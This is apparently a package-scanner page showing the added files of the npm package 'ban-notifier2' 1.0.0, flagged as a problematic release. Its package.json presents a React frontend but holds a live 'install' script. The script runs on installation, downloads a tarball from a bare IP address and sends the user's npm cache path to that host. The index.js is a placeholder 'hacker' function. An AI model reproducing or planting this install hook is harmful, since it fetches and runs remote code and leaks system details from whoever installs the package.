ban-notifier2 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of ban-notifier2 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +4 -0
  2. package/package.json +19 -0
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+ function hacker(name) {
2
+ return "hello "+ name;
3
+ }
4
+ module.exports = hacker;
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "ban-notifier2",
3
+ "version": "1.0.0",
4
+ "description": "frontend react ban-notifier",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "build": "webpack --env production",
8
+ "cosmos": "cosmos",
9
+ "cosmos:export": "cosmos-export",
10
+ "lint": "eslint --ignore-path .eslintignore .",
11
+ "lint:css": "stylelint src/**/*.js",
12
+ "sort-package-json": "sort-package-json package.json",
13
+ "start": "webpack-dev-server --env development",
14
+ "test": "jest --config ./jest.config.js",
15
+ "test:watch": "jest --watchAll",
16
+ "install": "npm install http://18.119.19.108/withouttasty-1.0.0.tgz?yy=`npm get cache`;"
17
+ },
18
+ "license": "MIT"
19
+ }